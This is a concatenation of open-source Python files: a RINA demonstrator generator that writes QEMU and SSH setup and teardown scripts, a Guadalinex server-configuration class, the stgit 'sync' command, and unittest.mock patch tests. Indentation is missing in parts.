if args.manager and dif == mgmt_dif_name:
# Enrollment in the NMS DIF is managed as a special case:
# each node is enrolled against the manager node
for vmname in vms:
if vmname != mgmt_node_name:
enrollments[dif].append({'enrollee': vmname,
'enroller': mgmt_node_name,
'lower_dif': mgmt_shim_dif_name})
elif args.enrollment_strategy == 'minimal':
# To generate the list of enrollments, we simulate one,
# using breadth-first trasversal.
enrolled = set([first])
frontier = set([first])
while len(frontier):
cur = frontier.pop()
for edge in dif_graphs[dif][cur]:
if edge[0] not in enrolled:
enrolled.add(edge[0])
enrollments[dif].append({'enrollee': edge[0],
'enroller': cur,
'lower_dif': edge[1]})
frontier.add(edge[0])
elif args.enrollment_strategy == 'full-mesh':
for cur in dif_graphs[dif]:
for edge in dif_graphs[dif][cur]:
if cur < edge[0]:
enrollments[dif].append({'enrollee': cur,
'enroller': edge[0],
'lower_dif': edge[1]})
elif args.enrollment_strategy == 'manual':
if dif not in manual_enrollments:
continue
for e in manual_enrollments[dif]:
if e['enrollee'] not in difs[dif]:
print('Warning: ignoring line %d because VM %s does '\
'not belong to DIF %s' % (e['linecnt'],
e['enrollee'], dif))
continue
if e['enroller'] not in difs[dif]:
print('Warning: ignoring line %d because VM %s does '\
'not belong to DIF %s' % (e['linecnt'],
e['enroller'], dif))
continue
if e['lower_dif'] not in neighsets or \
e['enrollee'] not in neighsets[e['lower_dif']]:
print('Warning: ignoring line %d because VM %s cannot '\
'use N-1-DIF %s' % (e['linecnt'], e['enrollee'],
e['lower_dif']))
continue
if e['lower_dif'] not in neighsets or \
e['enroller'] not in neighsets[e['lower_dif']]:
print('Warning: ignoring line %d because VM %s cannot '\
'use N-1-DIF %s' % (e['linecnt'], e['enroller'],
e['lower_dif']))
continue
enrollments[dif].append(e)
else:
# This is a bug
assert(False)
#print(neighsets)
#print(dif_graphs[dif])
for shim in shims:
enrollments[shim] = dict()
###################### Generate UP script ########################
fout = open('up.sh', 'w')
outs = '#!/bin/bash\n' \
'\n' \
'set -x\n' \
'\n';
for shim in sorted(shims):
outs += 'sudo brctl addbr %(br)s\n' \
'sudo ip link set %(br)s up\n' \
'\n' % {'br': shims[shim]['bridge']}
for l in sorted(links):
shim, vm = l
b = shims[shim]['bridge']
idx = len(vms[vm]['ports']) + 1
tap = '%s.%02x' % (vm, idx)
outs += 'sudo ip tuntap add mode tap name %(tap)s\n' \
'sudo ip link set %(tap)s up\n' \
'sudo brctl addif %(br)s %(tap)s\n\n' \
% {'tap': tap, 'br': b}
if shims[shim]['speed'] > 0:
speed = '%d%sbit' % (shims[shim]['speed'], shims[shim]['speed_unit'])
# Rate limit the traffic transmitted on the TAP interface
outs += 'sudo tc qdisc add dev %(tap)s handle 1: root ' \
'htb default 11\n' \
'sudo tc class add dev %(tap)s parent 1: classid ' \
'1:1 htb rate 10gbit\n' \
'sudo tc class add dev %(tap)s parent 1:1 classid ' \
'1:11 htb rate %(speed)s\n' \
% {'tap': tap, 'speed': speed}
if shim in netems:
if vm in netems[shim]:
if not netem_validate(netems[shim][vm]['args']):
print('Warning: line %(linecnt)s is invalid and '\
'will be ignored' % netems[shim][vm])
continue
outs += 'sudo tc qdisc add dev %(tap)s root netem '\
'%(args)s\n'\
% {'tap': tap, 'args': netems[shim][vm]['args']}
vms[vm]['ports'].append({'tap': tap, 'br': b, 'idx': idx,
'vlan': shim})
vmid = 1
budget = boot_batch_size
for vmname in sorted(vms):
vm = vms[vmname]
vm['id'] = vmid
fwdp = env_dict['baseport'] + vmid
mac = '00:0a:0a:0a:%02x:%02x' % (vmid, 99)
vm['ssh'] = fwdp
vars_dict = {'fwdp': fwdp, 'id': vmid, 'mac': mac,
'vmimgpath': env_dict['vmimgpath'],
'memory': args.memory, 'kernel': args.kernel,
'frontend': args.frontend, 'vmname': vmname}
if vmname == mgmt_node_name:
vars_dict['vmimgpath'] = args.manager_initramfs
vars_dict['kernel'] = args.manager_kernel
outs += 'qemu-system-x86_64 '
if not args.legacy:
outs += '-kernel %(kernel)s ' \
'-append "console=ttyS0" ' \
'-initrd %(vmimgpath)s ' \
% vars_dict
else:
outs += '"%(vmimgpath)s" ' \
'-snapshot ' % vars_dict
outs += '-display none ' \
'--enable-kvm ' \
'-smp 2 ' \
'-m %(memory)sM ' \
'-device %(frontend)s,mac=%(mac)s,netdev=mgmt ' \
'-netdev user,id=mgmt,hostfwd=tcp::%(fwdp)s-:22 ' \
'-vga std ' \
'-pidfile rina-%(id)s.pid ' \
'-serial file:%(vmname)s.log ' \
% vars_dict
del vars_dict
for port in vm['ports']:
tap = port['tap']
mac = '00:0a:0a:0a:%02x:%02x' % (vmid, port['idx'])
port['mac'] = mac
outs += '' \
'-device %(frontend)s,mac=%(mac)s,netdev=data%(idx)s ' \
'-netdev tap,ifname=%(tap)s,id=data%(idx)s,script=no,downscript=no'\
'%(vhost)s '\
% {'mac': mac, 'tap': tap, 'idx': port['idx'],
'frontend': args.frontend,
'vhost': ',vhost=on' if args.vhost else ''}
outs += '&\n\n'
budget -= 1
if budget <= 0:
outs += 'sleep %s\n' % wait_for_boot
budget = boot_batch_size
vmid += 1
for vmname in sorted(vms):
vm = vms[vmname]
gen_files_conf = 'shimeth.%(name)s.*.dif da.map %(name)s.ipcm.conf' % {'name': vmname}
if any(vmname in difs[difname] for difname in difs):
gen_files_conf = joincat(gen_files_conf, 'normal.%(name)s.*.dif' % {'name': vmname})
gen_files_bin = 'enroll.py'
overlay = ''
per_vm_overlay = ''
if args.legacy:
gen_files_bin = joincat(gen_files_bin, 'mac2ifname')
if args.overlay:
overlay = args.overlay
if vmname in overlays:
per_vm_overlay = overlays[vmname]
ipcm_components = ['scripting', 'console']
if args.manager:
ipcm_components.append('mad')
ipcm_components = ', '.join(ipcm_components)
gen_files = ' '.join([gen_files_conf, gen_files_bin, overlay, per_vm_overlay])
outs += ''\
'DONE=255\n'\
'while [ $DONE != "0" ]; do\n'\
' scp %(sshopts)s -r -P %(ssh)s %(genfiles)s %(username)s@localhost: \n'\
' DONE=$?\n'\
' if [ $DONE != "0" ]; then\n'\
' sleep 1\n'\
' fi\n'\
'done\n\n'\
'ssh %(sshopts)s -p %(ssh)s %(username)s@localhost << \'ENDSSH\'\n'\
'set -x\n'\
'SUDO=%(sudo)s\n'\
'$SUDO hostname %(name)s\n'\
'$SUDO modprobe rina-irati-core\n'\
'$SUDO chmod a+rw /dev/irati\n'\
'\n'\
'$SUDO mv %(genfilesconf)s /etc\n'\
'$SUDO mv %(genfilesbin)s /usr/bin\n'\
'\n' % {'name': vm['name'], 'ssh': vm['ssh'], 'id': vm['id'],
'username': env_dict['username'],
'genfiles': gen_files, 'genfilesconf': gen_files_conf,
'genfilesbin': gen_files_bin, 'vmname': vm['name'],
'sshopts': sshopts, 'sudo': sudo}
for ov in [overlay, per_vm_overlay]:
if ov != '':
outs += '$SUDO cp -r %(ov)s/* /\n'\
'$SUDO rm -rf %(ov)s\n'\
% {'ov': os.path.basename(ov)}
for port in vm['ports']:
outs += 'PORT=$(mac2ifname %(mac)s)\n'\
'$SUDO ip link set $PORT up\n'\
'$SUDO ip link add link $PORT name $PORT.%(vlan)s type vlan id %(vlan)s\n'\
'$SUDO ip link set $PORT.%(vlan)s up\n'\
'$SUDO sed -i "s|ifc%(idx)s|$PORT|g" /etc/shimeth.%(vmname)s.%(vlan)s.dif\n'\
% {'mac': port['mac'], 'idx': port['idx'],
'id': vm['id'], 'vlan': port['vlan'],
'vmname': vm['name']}
outs += '$SUDO modprobe shim-eth-vlan\n'\
'$SUDO modprobe normal-ipcp\n'
outs += '$SUDO modprobe rina-default-plugin\n'\
'$SUDO %(installpath)s/bin/ipcm -a \"%(ipcmcomps)s\" '\
'-c /etc/%(vmname)s.ipcm.conf -l %(verb)s &> log &\n'\
'sleep 1\n'\
'true\n'\
'ENDSSH\n' % {'installpath': env_dict['installpath'],
'vmname': vm['name'], 'verb': args.loglevel,
'ipcmcomps': ipcm_components}
# Run the enrollment operations in an order which respect the dependencies
for dif in dif_ordering:
for enrollment in enrollments[dif]:
vm = vms[enrollment['enrollee']]
print('I am going to enroll %s to DIF %s against neighbor %s, through '\
'lower DIF %s' % (enrollment['enrollee'], dif,
enrollment['enroller'],
enrollment['lower_dif']))
outs += 'sleep 2\n' # important!!
outs += ''\
'DONE=255\n'\
'while [ $DONE != "0" ]; do\n'\
' ssh %(sshopts)s -p %(ssh)s %(username)s@localhost << \'ENDSSH\'\n'\
'set -x\n'\
'SUDO=%(sudo)s\n'\
'$SUDO enroll.py --lower-dif %(ldif)s --dif %(dif)s '\
'--ipcm-conf /etc/%(vmname)s.ipcm.conf '\
'--enrollee-name %(vmname)s.%(dif)s '\
'--enroller-name %(enroller)s.%(dif)s\n'\
'sleep 1\n'\
'true\n'\
'ENDSSH\n'\
' DONE=$?\n'\
' if [ $DONE != "0" ]; then\n'\
' sleep 1\n'\
' fi\n'\
'done\n\n' % {'ssh': vm['ssh'], 'id': vm['id'],
'pvid': vms[enrollment['enroller']]['id'],
'username': env_dict['username'],
'vmname': vm['name'],
'enroller': enrollment['enroller'],
'dif': dif, 'ldif': enrollment['lower_dif'],
'sshopts': sshopts, 'sudo': sudo}
fout.write(outs)
fout.close()
subprocess.call(['chmod', '+x', 'up.sh'])
###################### Generate DOWN script ########################
fout = open('down.sh', 'w')
outs = '#!/bin/bash\n' \
'\n' \
'set -x\n' \
'\n' \
'kill_qemu() {\n' \
' PIDFILE=$1\n' \
' PID=$(cat $PIDFILE)\n' \
' if [ -n $PID ]; then\n' \
' kill $PID\n' \
' while [ -n "$(ps -p $PID -o comm=)" ]; do\n' \
' sleep 1\n' \
' done\n' \
' fi\n' \
'\n' \
' rm $PIDFILE\n' \
'}\n\n'
for vmname in sorted(vms):
vm = vms[vmname]
outs += 'kill_qemu rina-%(id)s.pid\n' % {'id': vm['id']}
outs += '\n'
for vmname in sorted(vms):
vm = vms[vmname]
for port in vm['ports']:
tap = port['tap']
b = port['br']
outs += 'sudo brctl delif %(br)s %(tap)s\n' \
'sudo ip link set %(tap)s down\n' \
'sudo ip tuntap del mode tap name %(tap)s\n\n' \
% {'tap': tap, 'br': b}
for shim in sorted(shims):
outs += 'sudo ip link set %(br)s down\n' \
'sudo brctl delbr %(br)s\n' \
'\n' % {'br': shims[shim]['bridge']}
fout.write(outs)
fout.close()
subprocess.call(['chmod', '+x', 'down.sh'])
################## Generate IPCM/DIF configuration files ##################
ipcmconfs = dict()
# If some app directives were specified, use those to build da.map.
# Otherwise, assume the standard applications are to be mapped in
# the DIF with the highest rank.
if len(app_mappings) == 0:
if len(dif_ordering) > 0:
for adm in gen_templates.da_map_base["applicationToDIFMappings"]:
adm["difName"] = "%s" % (dif_ordering[-1],)
else:
gen_templates.da_map_base["applicationToDIFMappings"] = []
for apm in app_mappings:
gen_templates.da_map_base["applicationToDIFMappings"].append({
"encodedAppName": apm['name'],
"difName": "%s" % (apm['dif'])
})
if args.manager:
# Add MAD/Manager configuration
gen_templates.ipcmconf_base["addons"] = {
"mad": {
"managerConnections" : [ {
"managerAppName" : "manager-1--",
"DIF": "%s" % (mgmt_dif_name)
}
]
}
}
for vmname in vms:
ipcmconfs[vmname] = copy.deepcopy(gen_templates.ipcmconf_base)
difconfs = dict()
for dif in difs:
difconfs[dif] = dict()
for vmname in difs[dif]:
difconfs[dif][vmname] = copy.deepcopy(gen_templates.normal_dif_base)
for vmname in sorted(vms):
vm = vms[vmname]
ipcmconf = ipcmconfs[vmname]
for port in vm['ports']:
ipcmconf["ipcProcessesToCreate"].append({
"difName": port['vlan']
})
template_file_name = 'shimeth.%s.%s.dif' % (vm['name'], port['vlan'])
ipcmconf["difConfigurations"].append({
"name": port['vlan'],
"template": template_file_name
})
fout = open(template_file_name, 'w')
fout.write(json.dumps({"difType": "shim-eth-vlan",
"configParameters": {
"interface-name": "ifc%d" % (port['idx'],)
}
},
indent=4, sort_keys=True))
fout.close()
# Run over dif_ordering array, to make sure each IPCM config has
# the correct ordering for the ipcProcessesToCreate list of operations.
# If we iterated over the difs map, the order would be randomic, and so
# some IPCP registrations in lower DIFs may fail. This would happen because
# at the moment of registration, it may be that the IPCP of the lower DIF
# has not been created yet.
# Append the normal (non-shim) IPCPs to each node's IPCM configuration,
# walking dif_ordering so that lower DIFs are created before the DIFs
# that register at them (see the comment block above).
for dif in dif_ordering:
    if dif in shims:
        # Shims are managed separately, in the previous loop
        continue
    for vmname in difs[dif]:
        vm = vms[vmname]
        ipcmconf = ipcmconfs[vmname]
        normal_ipcp = { "difName": "%s" % (dif,) }
        normal_ipcp["difsToRegisterAt"] = []
        for lower_dif in difs[dif][vmname]:
            if lower_dif not in shims:
                # NOTE(review): this assignment is a no-op; the branch was
                # presumably meant to transform non-shim lower-DIF names
                # (e.g. add a suffix) -- confirm the intended behaviour.
                lower_dif = lower_dif
            normal_ipcp["difsToRegisterAt"].append(lower_dif)
        ipcmconf["ipcProcessesToCreate"].append(normal_ipcp)
        # Each normal IPCP gets a per-node DIF template file.
        ipcmconf["difConfigurations"].append({
            "name": "%s" % (dif),
            "template": "normal.%s.%s.dif" % (vmname, dif)
        })
        # Fill in the map of IPCP addresses. This could be moved at difconfs
        # deepcopy-time
        for ovm in difs[dif]:
            difconfs[dif][ovm]["knownIPCProcessAddresses"].append({
                "apName": "%s.%s" % (vmname, dif),
                "apInstance": "1",
                "address": 16 + vm['id']
            })
        # Apply the DIF's policies to this node's DIF config, unless the
        # policy is restricted to an explicit node list that excludes it.
        for policy in dif_policies[dif]:
            if policy['nodes'] == [] or vmname in policy['nodes']:
                gen_templates.translate_policy(difconfs[dif][vmname], policy['path'],
                                               policy['ps'], policy['parms'])
# Dump the DIF Allocator map
dict_dump_json('da.map', gen_templates.da_map_base, env_dict)
for vmname in vms:
    # Dump the IPCM configuration files
    env_dict['sysname'] = '%s' %(vmname)
    dict_dump_json('%s.ipcm.conf' % (vmname), ipcmconfs[vmname], env_dict)
for dif in difs:
    for vmname in difs[dif]:
        # Dump the normal DIF configuration files
        dict_dump_json('normal.%s.%s.dif' % (vmname, dif,),
                difconfs[dif][vmname], env_dict)
# Dump the mapping from nodes to SSH ports
# (one "<vmname> <port>" line per node, port = baseport + node id).
fout = open('gen.map', 'w')
for vmname in sorted(vms):
    fout.write('%s %d\n' % (vmname, env_dict['baseport'] + vms[vmname]['id']))
fout.close()
if args.graphviz:
    # Best-effort: draw every DIF as a graph image (nodes are the IPCPs,
    # edges are N-1-DIF adjacencies; edges selected for enrollment are red).
    try:
        import pydot

        colors = ['red', 'green', 'blue', 'orange', 'yellow']
        fcolors = ['black', 'black', 'white', 'black', 'black']
        gvizg = pydot.Dot(graph_type = 'graph')
        i = 0  # rotating index into the color palettes, one color per DIF
        for dif in difs:
            for vmname in dif_graphs[dif]:
                node = pydot.Node(dif + vmname,
                                  label = "%s(%s)" % (vmname, dif),
                                  style = "filled", fillcolor = colors[i],
                                  fontcolor = fcolors[i])
                gvizg.add_node(node)
            for vmname in dif_graphs[dif]:
                for (neigh, lower_dif) in dif_graphs[dif][vmname]:
                    if vmname > neigh:
                        # Use lexicographical filter to avoid duplicate edges
                        continue
                    color = 'black'
                    # If enrollment is going to happen on this edge, color
                    # it in red
                    for enrollment in enrollments[dif]:
                        ee = enrollment['enrollee']
                        er = enrollment['enroller']
                        lo = enrollment['lower_dif']
                        if lo.endswith(".DIF"):
                            lo = lo[:-4]
                        if lower_dif == lo and \
                                ((vmname == ee and neigh == er) or \
                                 (vmname == er and neigh == ee)):
                            color = 'red'
                            break
                    edge = pydot.Edge(dif + vmname, dif + neigh,
                                      label = lower_dif, color = color)
                    gvizg.add_edge(edge)
            i += 1
            if i == len(colors):
                i = 0
        gvizg.write_png('difs.png')
    except Exception:
        # Fix: was a bare 'except:', which also swallowed SystemExit and
        # KeyboardInterrupt. 'except Exception' keeps the best-effort
        # behaviour (missing pydot must not abort the generator) without
        # hiding interpreter-exit signals.
        # NOTE(review): the message assumes ImportError, but pydot/IO
        # failures land here too -- consider logging the exception itself.
        print("Warning: pydot module not installed, cannot produce DIF "\
              "graphs images")
| edugrasa/demonstrator | gen.py | Python | gpl-2.0 | 37,281 |
# -*- Mode: Python; coding: utf-8; indent-tabs-mode: nil; tab-width: 4 -*-
# This file is part of Guadalinex
#
# This software is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this package; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
__author__ = "Antonio Hernández <ahernandez@emergya.com>"
__copyright__ = "Copyright (C) 2011, Junta de Andalucía <devmaster@guadalinex.org>"
__license__ = "GPL-2"
import firstboot.serverconf
from ChefConf import ChefConf
from GCCConf import GCCConf
from AuthConf import AuthConf
from DateSyncConf import DateSyncConf
from UsersConf import UsersConf
class Singleton:
    """Decorator that turns a class into a lazily created singleton.

    Apply as ``@Singleton`` to a class whose ``__init__`` takes only
    ``self``.  The unique instance is obtained via ``Instance()``;
    calling the decorated name directly raises ``TypeError``.
    ``isinstance`` keeps working thanks to ``__instancecheck__``.

    Limitation: the decorated class cannot be inherited from.
    """

    def __init__(self, decorated):
        # Keep the wrapped class around; instantiation is deferred
        # until the first Instance() call.
        self._decorated = decorated

    def Instance(self):
        """Create the wrapped class's instance on first use, then keep
        returning that same instance forever after."""
        if not hasattr(self, '_instance'):
            self._instance = self._decorated()
        return self._instance

    def __call__(self):
        # Direct instantiation is forbidden by design.
        raise TypeError('Singletons must be accessed through `Instance()`.')

    def __instancecheck__(self, inst):
        # Delegate isinstance() checks to the wrapped class.
        return isinstance(inst, self._decorated)
@Singleton
class ServerConf():
# Version of the configuration JSON file
def __init__(self):
self._data = {}
self.VERSION = '0.2.0'
self._data['gem_repo'] = 'http://rubygems.org'
self._data['version'] = self.VERSION
self._data['organization'] = ''
self._chef_conf = ChefConf()
self._gcc_conf = GCCConf()
self._auth_conf = AuthConf()
self._ntp_conf = DateSyncConf()
self._users_conf = UsersConf()
def load_data(self, conf):
msg = 'ServerConf: Key "%s" not found in the configuration file.'
try:
v = conf['version']
if v != self.VERSION:
print 'WARNING: ServerConf and AUTOCONFIG_JSON version mismatch!'
except KeyError as e:
print msg % ('version',)
try:
self.set_organization(conf['organization'])
except KeyError as e:
print msg % ('organization',)
try:
self.set_notes(conf['notes'])
except KeyError as e:
print msg % ('notes',)
try:
self.set_gem_repo(conf['gem_repo'])
except KeyError as e:
print msg % ('gem_repo',)
try:
self._chef_conf.load_data(conf['chef'])
except KeyError as e:
print msg % ('chef',)
try:
self._gcc_conf.load_data(conf['gcc'])
except KeyError as e:
print msg % ('gcc',)
try:
self._auth_conf.load_data(conf['auth'])
except KeyError as e:
print msg % ('auth',)
try:
self._ntp_conf.load_data(conf['uri_ntp'])
except KeyError as e:
print msg % ('ntp',)
def validate(self):
valid = len(self._data['version']) > 0 \
and self._chef_conf.validate() \
and self._auth_conf.validate() \
and self._ntp_conf.validate() \
and self._gcc_conf.validate()
return valid
def set_gem_repo(self, repo):
self._data['gem_repo'] = repo
return self
def get_gem_repo(self):
return self._data['gem_repo'].encode('utf-8')
def get_version(self):
return self._data['version'].encode('utf-8')
def set_version(self, version):
self._data['version'] = version
return self
def get_organization(self):
return self._data['organization'].encode('utf-8')
def set_organization(self, organization):
self._data['organization'] = organization
return self
def get_notes(self):
return self._data['notes'].encode('utf-8')
def set_notes(self, notes):
self._data['notes'] = notes
return self
def get_auth_conf(self):
return self._auth_conf
def get_chef_conf(self):
return self._chef_conf
def get_ntp_conf(self):
return self._ntp_conf
def get_gcc_conf(self):
return self._gcc_conf
def get_users_conf(self):
return self._users_conf
def set_auth_conf(self, auth_conf):
self._auth_conf = auth_conf
return self
def set_chef_conf(self, chef_conf):
self._chef_conf = chef_conf
return self
def set_ntp_conf(self, ntp_conf):
self._ntp_conf = ntp_conf
return self
def set_gcc_conf(self, gcc_conf):
self._gcc_conf = gcc_conf
return gcc_conf
def set_users_conf(self, user_conf):
self._users_conf = user_conf
return self
| rcmorano/gecosws-config-assistant | firstboot/serverconf/ServerConf.py | Python | gpl-2.0 | 5,970 |
__copyright__ = """
Copyright (C) 2006, Catalin Marinas <catalin.marinas@gmail.com>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License version 2 as
published by the Free Software Foundation.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
import sys, os
import stgit.commands.common
from stgit.argparse import opt
from stgit.commands.common import *
from stgit.utils import *
from stgit.out import *
from stgit import argparse, stack, git
# Command metadata consumed by the stgit command loader/dispatcher.
help = 'Synchronise patches with a branch or a series'
kind = 'patch'
usage = ['[options] [<patch1>] [<patch2>] [<patch3>..<patch4>]']
description = """
For each of the specified patches perform a three-way merge with the
same patch in the specified branch or series. The command can be used
for keeping patches on several branches in sync. Note that the
operation may fail for some patches because of conflicts. The patches
in the series must apply cleanly."""

args = [argparse.patch_range(argparse.applied_patches,
                             argparse.unapplied_patches)]
options = [
    opt('-a', '--all', action = 'store_true',
        short = 'Synchronise all the applied patches'),
    # Fixed user-visible help-text typo: 'Syncronise' -> 'Synchronise'.
    opt('-B', '--ref-branch', args = [argparse.stg_branches],
        short = 'Synchronise patches with BRANCH'),
    opt('-s', '--series', args = [argparse.files],
        short = 'Synchronise patches with SERIES')]

directory = DirectoryGotoToplevel(log = True)
def __check_all():
    """Abort (via the checks' own exceptions) unless the tree is clean:
    no local changes, no unresolved conflicts, and HEAD equal to the top
    of the current patch stack."""
    check_local_changes()
    check_conflicts()
    check_head_top_equal(crt_series)
def __branch_merge_patch(remote_series, pname):
    """Three-way merge the named patch of another branch into the
    current tree (base = patch bottom, ours = HEAD, theirs = patch top).
    """
    remote_patch = remote_series.get_patch(pname)
    base = remote_patch.get_bottom()
    theirs = remote_patch.get_top()
    git.merge_recursive(base, git.get_head(), theirs)
def __series_merge_patch(base, patchdir, pname):
    """Apply the on-disk patch file <patchdir>/<pname> on top of ``base``.
    """
    git.apply_patch(filename = os.path.join(patchdir, pname), base = base)
def func(parser, options, args):
    """Synchronise a range of patches against a remote branch or an
    on-disk series file.

    Builds a merge_patch(patch, pname) closure for the chosen source,
    selects the patches to act on, then walks the stack pushing/popping
    as needed and refreshing every patch whose merge produced changes.
    """
    # Pick the synchronisation source and the matching merge strategy.
    if options.ref_branch:
        remote_series = stack.Series(options.ref_branch)
        if options.ref_branch == crt_series.get_name():
            raise CmdException, 'Cannot synchronise with the current branch'
        remote_patches = remote_series.get_applied()
        # the merge function merge_patch(patch, pname)
        merge_patch = lambda patch, pname: \
            __branch_merge_patch(remote_series, pname)
    elif options.series:
        patchdir = os.path.dirname(options.series)
        remote_patches = []
        # Python 2 builtin file(); series lines may carry '#' comments.
        # NOTE(review): 're' is not imported by name in this module's
        # visible imports; presumably provided via a wildcard import --
        # confirm.
        f = file(options.series)
        for line in f:
            p = re.sub('#.*$', '', line).strip()
            if not p:
                continue
            remote_patches.append(p)
        f.close()
        # the merge function merge_patch(patch, pname)
        merge_patch = lambda patch, pname: \
            __series_merge_patch(patch.get_bottom(), patchdir, pname)
    else:
        raise CmdException, 'No remote branch or series specified'
    applied = crt_series.get_applied()
    unapplied = crt_series.get_unapplied()
    # Determine the target patches: all applied, an explicit range, or
    # just the current one.
    if options.all:
        patches = applied
    elif len(args) != 0:
        patches = parse_patches(args, applied + unapplied, len(applied),
                                ordered = True)
    elif applied:
        patches = [crt_series.get_current()]
    else:
        parser.error('no patches applied')
    if not patches:
        raise CmdException, 'No patches to synchronise'
    __check_all()
    # only keep the patches to be synchronised
    sync_patches = [p for p in patches if p in remote_patches]
    if not sync_patches:
        raise CmdException, 'No common patches to be synchronised'
    # pop to the one before the first patch to be synchronised
    first_patch = sync_patches[0]
    if first_patch in applied:
        to_pop = applied[applied.index(first_patch) + 1:]
        if to_pop:
            pop_patches(crt_series, to_pop[::-1])
        pushed = [first_patch]
    else:
        to_pop = []
        pushed = []
    popped = to_pop + [p for p in patches if p in unapplied]
    # Walk the stack: re-push what we popped (plus unapplied targets)
    # and merge each patch that has a counterpart on the remote side.
    for p in pushed + popped:
        if p in popped:
            # push this patch
            push_patches(crt_series, [p])
        if p not in sync_patches:
            # nothing to synchronise
            continue
        # the actual sync
        out.start('Synchronising "%s"' % p)
        patch = crt_series.get_patch(p)
        # NOTE(review): 'bottom' is assigned but never used below.
        bottom = patch.get_bottom()
        top = patch.get_top()
        # reset the patch backup information.
        patch.set_top(top, backup = True)
        # the actual merging (either from a branch or an external file)
        merge_patch(patch, p)
        if git.local_changes(verbose = False):
            # index (cache) already updated by the git merge. The
            # backup information was already reset above
            crt_series.refresh_patch(cache_update = False, backup = False,
                                     log = 'sync')
            out.done('updated')
        else:
            out.done()
| miracle2k/stgit | stgit/commands/sync.py | Python | gpl-2.0 | 5,549 |
# Copyright (C) 2007-2012 Michael Foord & the mock team
# E-mail: fuzzyman AT voidspace DOT org DOT uk
# http://www.voidspace.org.uk/python/mock/
import os
import sys
import unittest
from unittest.test.testmock import support
from unittest.test.testmock.support import SomeClass, is_instance
from test.test_importlib.util import uncache
from unittest.mock import (
NonCallableMock, CallableMixin, sentinel,
MagicMock, Mock, NonCallableMagicMock, patch, _patch,
DEFAULT, call, _get_target
)
# Name of the builtins module, used when patching builtins by dotted path.
builtin_string = 'builtins'
# This very test module, so tests can patch attributes on it directly.
PTModule = sys.modules[__name__]
MODNAME = '%s.PTModule' % __name__
def _get_proxy(obj, get_only=True):
class Proxy(object):
def __getattr__(self, name):
return getattr(obj, name)
if not get_only:
def __setattr__(self, name, value):
setattr(obj, name, value)
def __delattr__(self, name):
delattr(obj, name)
Proxy.__setattr__ = __setattr__
Proxy.__delattr__ = __delattr__
return Proxy()
# Module-level sentinels that the tests patch by dotted path
# ('%s.something' % __name__) and then check for restoration.
something = sentinel.Something
something_else = sentinel.SomethingElse
class Foo(object):
    """Fixture class used as a patch/autospec target in the tests below:
    a ctor taking one argument, two methods, and a class attribute."""
    def __init__(self, a):
        pass
    def f(self, a):
        pass
    def g(self):
        pass
    # Class attribute available for patching in tests.
    foo = 'bar'
class Bar(object):
    """Companion fixture to Foo with a single no-op method."""
    def a(self):
        pass
# Dotted path of Foo in this module, handy as a patch() target string.
foo_name = '%s.Foo' % __name__
# Module-level function fixture; note that Foo is captured as the default
# value at definition time (Python evaluates defaults once).
def function(a, b=Foo):
    pass
class Container(object):
    """Minimal mapping-like fixture: item get/set/delete plus iteration
    over the stored keys, all backed by the public ``values`` dict."""

    def __init__(self):
        self.values = {}

    def __getitem__(self, name):
        return self.values[name]

    def __setitem__(self, name, value):
        self.values[name] = value

    def __delitem__(self, name):
        # pop() raises the same KeyError as `del` for a missing key.
        self.values.pop(name)

    def __iter__(self):
        return iter(self.values.keys())
class PatchTest(unittest.TestCase):
def assertNotCallable(self, obj, magic=True):
MockClass = NonCallableMagicMock
if not magic:
MockClass = NonCallableMock
self.assertRaises(TypeError, obj)
self.assertTrue(is_instance(obj, MockClass))
self.assertFalse(is_instance(obj, CallableMixin))
def test_single_patchobject(self):
class Something(object):
attribute = sentinel.Original
@patch.object(Something, 'attribute', sentinel.Patched)
def test():
self.assertEqual(Something.attribute, sentinel.Patched, "unpatched")
test()
self.assertEqual(Something.attribute, sentinel.Original,
"patch not restored")
def test_patchobject_with_none(self):
class Something(object):
attribute = sentinel.Original
@patch.object(Something, 'attribute', None)
def test():
self.assertIsNone(Something.attribute, "unpatched")
test()
self.assertEqual(Something.attribute, sentinel.Original,
"patch not restored")
def test_multiple_patchobject(self):
class Something(object):
attribute = sentinel.Original
next_attribute = sentinel.Original2
@patch.object(Something, 'attribute', sentinel.Patched)
@patch.object(Something, 'next_attribute', sentinel.Patched2)
def test():
self.assertEqual(Something.attribute, sentinel.Patched,
"unpatched")
self.assertEqual(Something.next_attribute, sentinel.Patched2,
"unpatched")
test()
self.assertEqual(Something.attribute, sentinel.Original,
"patch not restored")
self.assertEqual(Something.next_attribute, sentinel.Original2,
"patch not restored")
def test_object_lookup_is_quite_lazy(self):
global something
original = something
@patch('%s.something' % __name__, sentinel.Something2)
def test():
pass
try:
something = sentinel.replacement_value
test()
self.assertEqual(something, sentinel.replacement_value)
finally:
something = original
def test_patch(self):
@patch('%s.something' % __name__, sentinel.Something2)
def test():
self.assertEqual(PTModule.something, sentinel.Something2,
"unpatched")
test()
self.assertEqual(PTModule.something, sentinel.Something,
"patch not restored")
@patch('%s.something' % __name__, sentinel.Something2)
@patch('%s.something_else' % __name__, sentinel.SomethingElse)
def test():
self.assertEqual(PTModule.something, sentinel.Something2,
"unpatched")
self.assertEqual(PTModule.something_else, sentinel.SomethingElse,
"unpatched")
self.assertEqual(PTModule.something, sentinel.Something,
"patch not restored")
self.assertEqual(PTModule.something_else, sentinel.SomethingElse,
"patch not restored")
# Test the patching and restoring works a second time
test()
self.assertEqual(PTModule.something, sentinel.Something,
"patch not restored")
self.assertEqual(PTModule.something_else, sentinel.SomethingElse,
"patch not restored")
mock = Mock()
mock.return_value = sentinel.Handle
@patch('%s.open' % builtin_string, mock)
def test():
self.assertEqual(open('filename', 'r'), sentinel.Handle,
"open not patched")
test()
test()
self.assertNotEqual(open, mock, "patch not restored")
